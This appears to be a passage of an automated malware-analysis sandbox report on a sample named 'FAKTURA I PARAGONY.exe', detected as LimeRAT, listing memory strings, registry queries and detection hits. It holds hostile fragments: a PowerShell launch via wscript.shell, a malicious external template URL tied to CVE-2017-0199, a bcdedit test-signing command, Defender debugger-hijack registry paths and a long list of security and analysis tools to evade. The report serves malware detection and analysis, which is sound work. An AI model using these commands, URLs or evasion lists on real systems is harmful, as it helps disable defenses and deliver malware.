Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: r("wscript.shell")f4444444444444.run("powershell$
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: ='http://transfer.sh/
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: .txt'
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: +!#scpt:exploit:o97m/cve-2017-0199.dddd8!mtb
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: usa-national.info/gpu/dazed/senses.dot'targetmode="external"
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: qusa-national.info/gpu/dazed/senses.dot'targetmode="external"
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: ktarget='http://
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: +!#scpt:trojandownloader:powershell/tnega.pb
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: kthreaddi,sysrv,sysrv012,sysrv011,sysrv010,sysrv00*-erroractionsilentlycontinue
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: qkthreaddi,sysrv,sysrv012,sysrv011,sysrv010,sysrv00*-erroractionsilentlycontinue
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: +!#script:virtool:win32/autinject.bp!replace
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: run($a)func_x($string,$deli,$rep)returnstringreplace($string,$deli,$rep)endfunc
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: qrun($a)func_x($string,$deli,$rep)returnstringreplace($string,$deli,$rep)endfunc
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: ,!#scpt:trojandownloader:o97m/encdoc.sma2!mtb
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: saohaoeaolaolao3ao2aosaohaoeaolaolaoeaoxaoeaocaouaotaoeaoaaojaojaocaocaocaocao
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: psaohaoeaolaolao3ao2aosaohaoeaolaolaoeaoxaoeaocaouaotaoeaoaaojaojaocaocaocaocao
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: ,!#scpt:trojandownloader:vbs/donvibs.prc3!mtb
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: getobject("winmgmts:"&"{impersonationlevel=impersonate}!\\"&"."&"\root\cimv2")
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: pgetobject("winmgmts:"&"{impersonationlevel=impersonate}!\\"&"."&"\root\cimv2")
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: .!#scpt:trojan:js/wmiactivescriptconsumer.a!ams
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: setpropvalue.consumer("\\.\root\subscription:activescripteventconsumer.name=
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: nsetpropvalue.consumer("\\.\root\subscription:activescripteventconsumer.name=
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: 4!#alf:backdoor:script/vsbuildeventpowershellrundll.a
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: buildevent><command>powershell

Source: C:\Users\user\Desktop\FAKTURA I PARAGONY.exe

Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe 'C:\Users\user\Desktop\FAKTURA I PARAGONY.exe'

Source: MpSigStub.exe, 00000023.00000003.6346082988.0000028BD6579000.00000004.00000001.sdmp	Binary or memory string: MSVBVM60MSVBVM50MSVBVM events are artifactsRICHEDIT50Wmyself.dll%08x0x%xException in the timer procC:\Wallpaper1.bmp2 :\|:1 11EditButtonVDLL:HMValidateHandleCalledC:\C:\WinSta0SkypeControlAPISkypeControlAPIAttachSkypeControlAPIDiscoverGDI32.DLLArmadillo_MutexGDI32.DLLChildControlStaticListBoxScrollBarComboBox#32770DialogPEEMU:VirTool:Win32/Obfuscator_Upatreriched20.dllRichEditANSIWndProcRichEditMDICLIENTMDICLIENTlistboxWINSTA0WinSta0Winsta0Winsta000000409CursorInternet Explorer_ServerTibiaClientTibia#32769ATL:007BF380YTopWindowYahooBuddyMainYahoo! MessengerWMPlayerAppPlaying MP3NotepadMy saved passwords - NotepadProgram ManagerShell_TrayWndtooltips_class32CityBank log-inIEFrameBank of America log-infalsetrue_Dummy_0x6A__Dummy_0x69__Dummy_0x68__Dummy_0x67__Dummy_0x66__Dummy_0x65__Dummy_0x64__Dummy_0x63__Dummy_0x62__Dummy_0x61__Dummy_0x60__Dummy_0x5F__Dummy_0x5E__Dummy_0x5D__Dummy_0x5C__Dummy_0x5B__Dummy_0x5A__Dummy_0x59__Dummy_0x58__Dummy_0x57__Dummy_0x56__Dummy_0x55__Dummy_0x54__Dummy_0x53__Dummy_0x52__Dummy_0x51__Dummy_0x50__Dummy_0x4F__Dummy_0x4E__Dummy_0x4D__Dummy_0x4C__Dummy_0x4B__Dummy_0x4A__Dummy_0x49__Dummy_0x48__Dummy_0x47__Dummy_0x46__Dummy_0x45__Dummy_0x44__Dummy_0x43__Dummy_0x42__Dummy_0x41__Dummy_0x40__Dummy_0x3F__Dummy_0x3E__Dummy_0x3D__Dummy_0x3C__Dummy_0x3B__Dummy_0x3A__Dummy_0x39__Dummy_0x38__Dummy_0x37__Dummy_0x36__DummyAA__DummyZ__DummyW__DummyV__DummyU__DummyT__DummyS__DummyR__DummyQ__DummyP__DummyO__DummyN__DummyM__DummyL__DummyK__DummyJ__DummyI__DummyH__DummyG__DummyF__DummyE__DummyD__DummyC__DummyB__DummyA__Dummy9__Dummy_x1c__Dummy7__Dummy6__Dummy5__Dummy4__Dummy3__Dummy2__Dummy_
Source: MpSigStub.exe, 00000023.00000003.6277926837.0000028BD7CD1000.00000004.00000001.sdmp	Binary or memory string: C:\WINDOWS\SYSTEM32\progman.exeexe D
Source: RegAsm.exe, 0000000A.00000002.7233799884.00000000019A0000.00000002.00020000.sdmp, UserOOBEBroker.exe, 00000016.00000002.7228199814.000001FD6DC40000.00000002.00020000.sdmp, MpSigStub.exe, 00000023.00000003.6437087417.0000028BD682E000.00000004.00000001.sdmp	Binary or memory string: Program Manager
Source: RegAsm.exe, 0000000A.00000002.7233799884.00000000019A0000.00000002.00020000.sdmp, UserOOBEBroker.exe, 00000016.00000002.7228199814.000001FD6DC40000.00000002.00020000.sdmp, MpSigStub.exe, 00000023.00000003.6437420306.0000028BD7B02000.00000004.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: MpSigStub.exe, 00000023.00000003.6270596186.0000028BD6DDB000.00000004.00000001.sdmp	Binary or memory string: GetProgmanWindow
Source: RegAsm.exe, 0000000A.00000002.7233799884.00000000019A0000.00000002.00020000.sdmp, UserOOBEBroker.exe, 00000016.00000002.7228199814.000001FD6DC40000.00000002.00020000.sdmp	Binary or memory string: Progman
Source: MpSigStub.exe, 00000023.00000003.6266211680.0000028BD6B88000.00000004.00000001.sdmp	Binary or memory string: %s\Rundll32.exe "%s\%s",DllCanUnloadNowShell_TrayWndSoftware\
Source: MpSigStub.exe, 00000023.00000003.6341363005.0000028BD7DAE000.00000004.00000001.sdmp	Binary or memory string: Shell_TrayWndx
Source: MpSigStub.exe, 00000023.00000003.6429782920.0000028BD77E9000.00000004.00000001.sdmp	Binary or memory string: ~SystemCache.batShell_TrayWnd
Source: MpSigStub.exe, 00000023.00000003.6315036458.0000028BD60E4000.00000004.00000001.sdmp	Binary or memory string: \Internet Explorer\Quick Launch\Shell_TrayWnd
Source: MpSigStub.exe, 00000023.00000003.6290474663.0000028BD5FE4000.00000004.00000001.sdmp	Binary or memory string: Progman Folder*Administrative Tools
Source: RegAsm.exe, 0000000A.00000002.7233799884.00000000019A0000.00000002.00020000.sdmp, UserOOBEBroker.exe, 00000016.00000002.7228199814.000001FD6DC40000.00000002.00020000.sdmp	Binary or memory string: Progmanlock
Source: MpSigStub.exe, 00000023.00000003.6286543485.0000028BD62AA000.00000004.00000001.sdmp	Binary or memory string: shell_traywnd%s\C:\WINDOWS\Sy
Source: MpSigStub.exe, 00000023.00000003.6436760184.0000028BD67ED000.00000004.00000001.sdmp	Binary or memory string: Explorer.exeShell_TrayWndGetProc
Source: MpSigStub.exe, 00000023.00000003.6286543485.0000028BD62AA000.00000004.00000001.sdmp	Binary or memory string: shell_traywnd
Source: MpSigStub.exe, 00000023.00000003.6270596186.0000028BD6DDB000.00000004.00000001.sdmp	Binary or memory string: SetProgmanWindow
Source: MpSigStub.exe, 00000023.00000003.6316424698.0000028BD7976000.00000004.00000001.sdmp	Binary or memory string: shell_traywnd

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-51041e98.exe

Code function: 34_2_00007FF7EDDE8ED4 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

Lowering of HIPS / PFW / Operating System Security Settings:

Yara detected LimeRAT

Show sources

Source: Yara match	File source: 00000023.00000003.6437087417.0000028BD682E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000003.6436106917.0000028BD69FC000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR

May enable test signing (to load unsigned drivers)

Show sources

Source: MpSigStub.exe, 00000023.00000003.6267325282.0000028BD7515000.00000004.00000001.sdmp	Memory string: bcdedit.exe -set TESTSIGNING ON
Source: MpSigStub.exe, 00000023.00000003.6269231712.0000028BC3EF4000.00000004.00000001.sdmp	Memory string: bcdedit.exe -set TESTSIGNING ON

Source: MpSigStub.exe, 00000023.00000003.6429470799.0000028BD77A7000.00000004.00000001.sdmp

Binary or memory string: &S:(ML;;NRNWNX;;;LW)

Source: MpSigStub.exe, 00000023.00000003.6343684141.0000028BD6D99000.00000004.00000001.sdmp	Binary or memory string: scanwscs.exe
Source: MpSigStub.exe, 00000023.00000003.6277926837.0000028BD7CD1000.00000004.00000001.sdmp	Binary or memory string: \avgupd.exe
Source: MpSigStub.exe, 00000023.00000003.6290474663.0000028BD5FE4000.00000004.00000001.sdmp	Binary or memory string: Bsoftware\microsoft\windows\currentversion\app paths\wireshark.exe
Source: MpSigStub.exe, 00000023.00000003.6280430921.0000028BD7B02000.00000004.00000001.sdmp	Binary or memory string: procmon.exe
Source: MpSigStub.exe, 00000023.00000003.6335925716.0000028BD63AB000.00000004.00000001.sdmp	Binary or memory string: tcpview.exe
Source: MpSigStub.exe, 00000023.00000003.6430356442.0000028BD7C4C000.00000004.00000001.sdmp	Binary or memory string: \startup\360tray.exe
Source: MpSigStub.exe, 00000023.00000003.6343684141.0000028BD6D99000.00000004.00000001.sdmp	Binary or memory string: fsgk32.exe
Source: MpSigStub.exe, 00000023.00000003.6343684141.0000028BD6D99000.00000004.00000001.sdmp	Binary or memory string: bullguard.exe
Source: MpSigStub.exe, 00000023.00000003.6429156271.0000028BD7766000.00000004.00000001.sdmp	Binary or memory string: kav32.exe
Source: MpSigStub.exe, 00000023.00000003.6429470799.0000028BD77A7000.00000004.00000001.sdmp	Binary or memory string: sched.exe
Source: MpSigStub.exe, 00000023.00000003.6271903950.0000028BD6A3F000.00000004.00000001.sdmp	Binary or memory string: fsm32.exe
Source: MpSigStub.exe, 00000023.00000003.6433423811.0000028BD748F000.00000004.00000001.sdmp	Binary or memory string: ravmond.exe
Source: MpSigStub.exe, 00000023.00000003.6334830370.0000028BD7708000.00000004.00000001.sdmp	Binary or memory string: hijackthis.exe
Source: MpSigStub.exe, 00000023.00000003.6308515408.0000028BD71BB000.00000004.00000001.sdmp	Binary or memory string: \windows defender\msascui.exe
Source: MpSigStub.exe, 00000023.00000003.6271903950.0000028BD6A3F000.00000004.00000001.sdmp	Binary or memory string: fsav32.exe
Source: MpSigStub.exe, 00000023.00000003.6313262116.0000028BD723F000.00000004.00000001.sdmp	Binary or memory string: \msmpeng.exe
Source: MpSigStub.exe, 00000023.00000003.6340606272.0000028BD78F3000.00000004.00000001.sdmp	Binary or memory string: FSMA32.EXE
Source: MpSigStub.exe, 00000023.00000003.6301785848.0000028BD7C0A000.00000004.00000001.sdmp	Binary or memory string: [HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msascui.exe
Source: MpSigStub.exe, 00000023.00000003.6437420306.0000028BD7B02000.00000004.00000001.sdmp	Binary or memory string: kavsvc.exe
Source: MpSigStub.exe, 00000023.00000003.6271903950.0000028BD6A3F000.00000004.00000001.sdmp	Binary or memory string: fsbl.exe
Source: MpSigStub.exe, 00000023.00000003.6436439478.0000028BD6A3D000.00000004.00000001.sdmp	Binary or memory string: KVXP.kxp
Source: MpSigStub.exe, 00000023.00000003.6335925716.0000028BD63AB000.00000004.00000001.sdmp	Binary or memory string: procdump.exe
Source: MpSigStub.exe, 00000023.00000003.6343684141.0000028BD6D99000.00000004.00000001.sdmp	Binary or memory string: fpavserver.exe
Source: MpSigStub.exe, 00000023.00000003.6430356442.0000028BD7C4C000.00000004.00000001.sdmp	Binary or memory string: \360tray.exe
Source: MpSigStub.exe, 00000023.00000003.6286809278.0000028BD6A80000.00000004.00000001.sdmp	Binary or memory string: kxetray.exe
Source: MpSigStub.exe, 00000023.00000003.6346082988.0000028BD6579000.00000004.00000001.sdmp	Binary or memory string: \virus.exe
Source: MpSigStub.exe, 00000023.00000003.6315879958.0000028BD6D14000.00000004.00000001.sdmp	Binary or memory string: wireshark.exe
Source: MpSigStub.exe, 00000023.00000003.6430356442.0000028BD7C4C000.00000004.00000001.sdmp	Binary or memory string: KAVPFW.EXE
Source: MpSigStub.exe, 00000023.00000003.6429470799.0000028BD77A7000.00000004.00000001.sdmp	Binary or memory string: ESET\nod32.exe
Source: MpSigStub.exe, 00000023.00000003.6437420306.0000028BD7B02000.00000004.00000001.sdmp	Binary or memory string: pctsGui.exe
Source: MpSigStub.exe, 00000023.00000003.6343684141.0000028BD6D99000.00000004.00000001.sdmp	Binary or memory string: sbamtray.exe
Source: MpSigStub.exe, 00000023.00000003.6267325282.0000028BD7515000.00000004.00000001.sdmp	Binary or memory string: 360tray.exe
Source: MpSigStub.exe, 00000023.00000003.6346082988.0000028BD6579000.00000004.00000001.sdmp	Binary or memory string: torun.infshell\open\command=virus.exe[AutoRun]\virus.exe
Source: MpSigStub.exe, 00000023.00000003.6433098800.0000028BD744E000.00000004.00000001.sdmp	Binary or memory string: kpfwsvc.exe
Source: MpSigStub.exe, 00000023.00000003.6437748593.0000028BD7B43000.00000004.00000001.sdmp	Binary or memory string: 360Tray.exe
Source: MpSigStub.exe, 00000023.00000003.6343684141.0000028BD6D99000.00000004.00000001.sdmp	Binary or memory string: superantispyware.exe
Source: MpSigStub.exe, 00000023.00000003.6340606272.0000028BD78F3000.00000004.00000001.sdmp	Binary or memory string: mcvsshld.exe
Source: MpSigStub.exe, 00000023.00000003.6437420306.0000028BD7B02000.00000004.00000001.sdmp	Binary or memory string: RavmonD.exe
Source: MpSigStub.exe, 00000023.00000003.6301785848.0000028BD7C0A000.00000004.00000001.sdmp	Binary or memory string: [HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msmpeng.exe
Source: MpSigStub.exe, 00000023.00000003.6279726781.0000028BD6C0C000.00000004.00000001.sdmp	Binary or memory string: \windows defender\msmpeng.exe
Source: MpSigStub.exe, 00000023.00000003.6343684141.0000028BD6D99000.00000004.00000001.sdmp	Binary or memory string: op_mon.exe
Source: MpSigStub.exe, 00000023.00000003.6343684141.0000028BD6D99000.00000004.00000001.sdmp	Binary or memory string: k7emlpxy.exe
Source: MpSigStub.exe, 00000023.00000003.6433098800.0000028BD744E000.00000004.00000001.sdmp	Binary or memory string: CCenter.exe
Source: MpSigStub.exe, 00000023.00000003.6301785848.0000028BD7C0A000.00000004.00000001.sdmp	Binary or memory string: HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msmpeng.exe
Source: MpSigStub.exe, 00000023.00000003.6433098800.0000028BD744E000.00000004.00000001.sdmp	Binary or memory string: KWatch.exe
Source: MpSigStub.exe, 00000023.00000003.6343684141.0000028BD6D99000.00000004.00000001.sdmp	Binary or memory string: quhlpsvc.exe
Source: MpSigStub.exe, 00000023.00000003.6437748593.0000028BD7B43000.00000004.00000001.sdmp	Binary or memory string: KvXP.kxp
Source: MpSigStub.exe, 00000023.00000003.6433098800.0000028BD744E000.00000004.00000001.sdmp	Binary or memory string: kpfw32.exe
Source: MpSigStub.exe, 00000023.00000003.6346459854.0000028BD6536000.00000004.00000001.sdmp	Binary or memory string: msmpeng.exe
Source: MpSigStub.exe, 00000023.00000003.6433423811.0000028BD748F000.00000004.00000001.sdmp	Binary or memory string: 360TraY.exe
Source: MpSigStub.exe, 00000023.00000003.6343684141.0000028BD6D99000.00000004.00000001.sdmp	Binary or memory string: k7pssrvc.exe
Source: MpSigStub.exe, 00000023.00000003.6280069144.0000028BD7AC1000.00000004.00000001.sdmp	Binary or memory string: *.csv.\|!\SBAMSvc.exe
Source: MpSigStub.exe, 00000023.00000003.6343684141.0000028BD6D99000.00000004.00000001.sdmp	Binary or memory string: k7tsmngr.exe
Source: MpSigStub.exe, 00000023.00000003.6343684141.0000028BD6D99000.00000004.00000001.sdmp	Binary or memory string: emlproxy.exe
Source: MpSigStub.exe, 00000023.00000003.6429156271.0000028BD7766000.00000004.00000001.sdmp	Binary or memory string: nod32.exe
Source: MpSigStub.exe, 00000023.00000003.6324018589.0000028BD69FC000.00000004.00000001.sdmp	Binary or memory string: kav.exe
Source: MpSigStub.exe, 00000023.00000003.6433098800.0000028BD744E000.00000004.00000001.sdmp	Binary or memory string: kvsrvxp.exe
Source: MpSigStub.exe, 00000023.00000003.6343684141.0000028BD6D99000.00000004.00000001.sdmp	Binary or memory string: fprottray.exe
Source: MpSigStub.exe, 00000023.00000003.6278531314.0000028BD61AB000.00000004.00000001.sdmp	Binary or memory string: savservice.exe
Source: MpSigStub.exe, 00000023.00000003.6343684141.0000028BD6D99000.00000004.00000001.sdmp	Binary or memory string: clamtray.exe
Source: MpSigStub.exe, 00000023.00000003.6429156271.0000028BD7766000.00000004.00000001.sdmp	Binary or memory string: nod32krn.exe
Source: MpSigStub.exe, 00000023.00000003.6293840071.0000028BD7E72000.00000004.00000001.sdmp	Binary or memory string: avgupd.exe
Source: MpSigStub.exe, 00000023.00000003.6433098800.0000028BD744E000.00000004.00000001.sdmp	Binary or memory string: DefWatch.exe
Source: MpSigStub.exe, 00000023.00000003.6343684141.0000028BD6D99000.00000004.00000001.sdmp	Binary or memory string: guardxservice.exe
Source: MpSigStub.exe, 00000023.00000003.6342575052.0000028BD6369000.00000004.00000001.sdmp	Binary or memory string: regshot.exe
Source: MpSigStub.exe, 00000023.00000003.6430356442.0000028BD7C4C000.00000004.00000001.sdmp	Binary or memory string: bdagent.exe
Source: MpSigStub.exe, 00000023.00000003.6433098800.0000028BD744E000.00000004.00000001.sdmp	Binary or memory string: kavstart.exe
Source: MpSigStub.exe, 00000023.00000003.6343684141.0000028BD6D99000.00000004.00000001.sdmp	Binary or memory string: k7fwsrvc.exe
Source: MpSigStub.exe, 00000023.00000003.6432193313.0000028BD6D97000.00000004.00000001.sdmp	Binary or memory string: \avp.exe
Source: MpSigStub.exe, 00000023.00000003.6430060790.0000028BD7CD0000.00000004.00000001.sdmp	Binary or memory string: KavPFW.EXE
Source: MpSigStub.exe, 00000023.00000003.6433423811.0000028BD748F000.00000004.00000001.sdmp	Binary or memory string: MSMPENG.EXE
Source: MpSigStub.exe, 00000023.00000003.6290963131.0000028BD73CB000.00000004.00000001.sdmp	Binary or memory string: \kav.exe
Source: MpSigStub.exe, 00000023.00000003.6277372616.0000028BD786E000.00000004.00000001.sdmp	Binary or memory string: 0{645FF040-5081-101B-9F08-00AA002F954E}\kav32.exe
Source: MpSigStub.exe, 00000023.00000003.6283231817.0000028BD6AFE000.00000004.00000001.sdmp	Binary or memory string: lordpe.exe
Source: MpSigStub.exe, 00000023.00000003.6343684141.0000028BD6D99000.00000004.00000001.sdmp	Binary or memory string: avkservice.exe
Source: MpSigStub.exe, 00000023.00000003.6343684141.0000028BD6D99000.00000004.00000001.sdmp	Binary or memory string: virusutilities.exe
Source: MpSigStub.exe, 00000023.00000003.6429470799.0000028BD77A7000.00000004.00000001.sdmp	Binary or memory string: McAfee.com\VSO\Mcshield.exe
Source: MpSigStub.exe, 00000023.00000003.6269393407.0000028BC3ECC000.00000004.00000001.sdmp	Binary or memory string: *.manifest.\|!\SavService.exe
Source: MpSigStub.exe, 00000023.00000003.6269774597.0000028BC3EE4000.00000004.00000001.sdmp	Binary or memory string: autoruns.exe
Source: MpSigStub.exe, 00000023.00000003.6343684141.0000028BD6D99000.00000004.00000001.sdmp	Binary or memory string: k7rtscan.exe
Source: MpSigStub.exe, 00000023.00000003.6431223020.0000028BD7EB4000.00000004.00000001.sdmp	Binary or memory string: SPIDERNT.EXE
Source: MpSigStub.exe, 00000023.00000003.6271144612.0000028BD765F000.00000004.00000001.sdmp	Binary or memory string: msascui.exe
Source: MpSigStub.exe, 00000023.00000003.6340606272.0000028BD78F3000.00000004.00000001.sdmp	Binary or memory string: mcagent.exe
Source: MpSigStub.exe, 00000023.00000003.6431223020.0000028BD7EB4000.00000004.00000001.sdmp	Binary or memory string: ICESWORD.EXE
Source: MpSigStub.exe, 00000023.00000003.6343684141.0000028BD6D99000.00000004.00000001.sdmp	Binary or memory string: avkproxy.exe
Source: MpSigStub.exe, 00000023.00000003.6283884268.0000028BD64D2000.00000004.00000001.sdmp	Binary or memory string: AyAgent.aye
Source: MpSigStub.exe, 00000023.00000003.6313262116.0000028BD723F000.00000004.00000001.sdmp	Binary or memory string: AVGcsrvx.exe
Source: MpSigStub.exe, 00000023.00000003.6290474663.0000028BD5FE4000.00000004.00000001.sdmp	Binary or memory string: RC:\Program Files\Wireshark\wireshark.exe
Source: MpSigStub.exe, 00000023.00000003.6429156271.0000028BD7766000.00000004.00000001.sdmp	Binary or memory string: AVP.EXE
Source: MpSigStub.exe, 00000023.00000003.6271903950.0000028BD6A3F000.00000004.00000001.sdmp	Binary or memory string: bdss.exe
Source: MpSigStub.exe, 00000023.00000003.6343684141.0000028BD6D99000.00000004.00000001.sdmp	Binary or memory string: sbamsvc.exe
Source: MpSigStub.exe, 00000023.00000003.6340606272.0000028BD78F3000.00000004.00000001.sdmp	Binary or memory string: Vsserv.exe
Source: MpSigStub.exe, 00000023.00000003.6429156271.0000028BD7766000.00000004.00000001.sdmp	Binary or memory string: IceSword.exe
Source: MpSigStub.exe, 00000023.00000003.6305976502.0000028BD7388000.00000004.00000001.sdmp	Binary or memory string: SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\360safe.exe
Source: MpSigStub.exe, 00000023.00000003.6343684141.0000028BD6D99000.00000004.00000001.sdmp	Binary or memory string: clamwin.exe
Source: MpSigStub.exe, 00000023.00000003.6429156271.0000028BD7766000.00000004.00000001.sdmp	Binary or memory string: kvxp.kxp
Source: MpSigStub.exe, 00000023.00000003.6301785848.0000028BD7C0A000.00000004.00000001.sdmp	Binary or memory string: HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msascui.exe
Source: MpSigStub.exe, 00000023.00000003.6343684141.0000028BD6D99000.00000004.00000001.sdmp	Binary or memory string: fsma32.exe
Source: MpSigStub.exe, 00000023.00000003.6280069144.0000028BD7AC1000.00000004.00000001.sdmp	Binary or memory string: MSASCui.exe
Source: MpSigStub.exe, 00000023.00000003.6343684141.0000028BD6D99000.00000004.00000001.sdmp	Binary or memory string: acs.exe
Source: MpSigStub.exe, 00000023.00000003.6433423811.0000028BD748F000.00000004.00000001.sdmp	Binary or memory string: Ravmond.exe
Source: MpSigStub.exe, 00000023.00000003.6429156271.0000028BD7766000.00000004.00000001.sdmp	Binary or memory string: avp.exe
Source: MpSigStub.exe, 00000023.00000003.6437748593.0000028BD7B43000.00000004.00000001.sdmp	Binary or memory string: 360safe.exe
Source: MpSigStub.exe, 00000023.00000003.6433098800.0000028BD744E000.00000004.00000001.sdmp	Binary or memory string: RavTask.exe
Source: MpSigStub.exe, 00000023.00000003.6280430921.0000028BD7B02000.00000004.00000001.sdmp	Binary or memory string: Wireshark.exe
Source: MpSigStub.exe, 00000023.00000003.6334830370.0000028BD7708000.00000004.00000001.sdmp	Binary or memory string: 360Safe.exe
Source: MpSigStub.exe, 00000023.00000003.6437748593.0000028BD7B43000.00000004.00000001.sdmp	Binary or memory string: KAV32.exe
Source: MpSigStub.exe, 00000023.00000003.6346082988.0000028BD6579000.00000004.00000001.sdmp	Binary or memory string: c:\123.exe
Source: MpSigStub.exe, 00000023.00000003.6280069144.0000028BD7AC1000.00000004.00000001.sdmp	Binary or memory string: *.jpg.\|!\SavService.exe
Source: MpSigStub.exe, 00000023.00000003.6434983405.0000028BD7D95000.00000004.00000001.sdmp	Binary or memory string: avgnt.exe
Source: MpSigStub.exe, 00000023.00000003.6267925507.0000028BD6E61000.00000004.00000001.sdmp	Binary or memory string: \vipre business agent\sbamsvc.exe
Source: MpSigStub.exe, 00000023.00000003.6437420306.0000028BD7B02000.00000004.00000001.sdmp	Binary or memory string: a2guard.exe
Source: MpSigStub.exe, 00000023.00000003.6343684141.0000028BD6D99000.00000004.00000001.sdmp	Binary or memory string: mbam.exe
Source: MpSigStub.exe, 00000023.00000003.6315879958.0000028BD6D14000.00000004.00000001.sdmp	Binary or memory string: ollydbg.exe
Source: MpSigStub.exe, 00000023.00000003.6287012861.0000028BD6A98000.00000004.00000001.sdmp	Binary or memory string: (\avp.exe
Source: MpSigStub.exe, 00000023.00000003.6340606272.0000028BD78F3000.00000004.00000001.sdmp	Binary or memory string: FSMB32.EXE
Source: MpSigStub.exe, 00000023.00000003.6302159310.0000028BD7C4C000.00000004.00000001.sdmp	Binary or memory string: Image File Execution Options\msmpeng.exeDebuggerImage File Execution Options\msascui.exe
Source: MpSigStub.exe, 00000023.00000003.6343684141.0000028BD6D99000.00000004.00000001.sdmp	Binary or memory string: avktray.exe
Source: MpSigStub.exe, 00000023.00000003.6315879958.0000028BD6D14000.00000004.00000001.sdmp	Binary or memory string: Regshot.exe
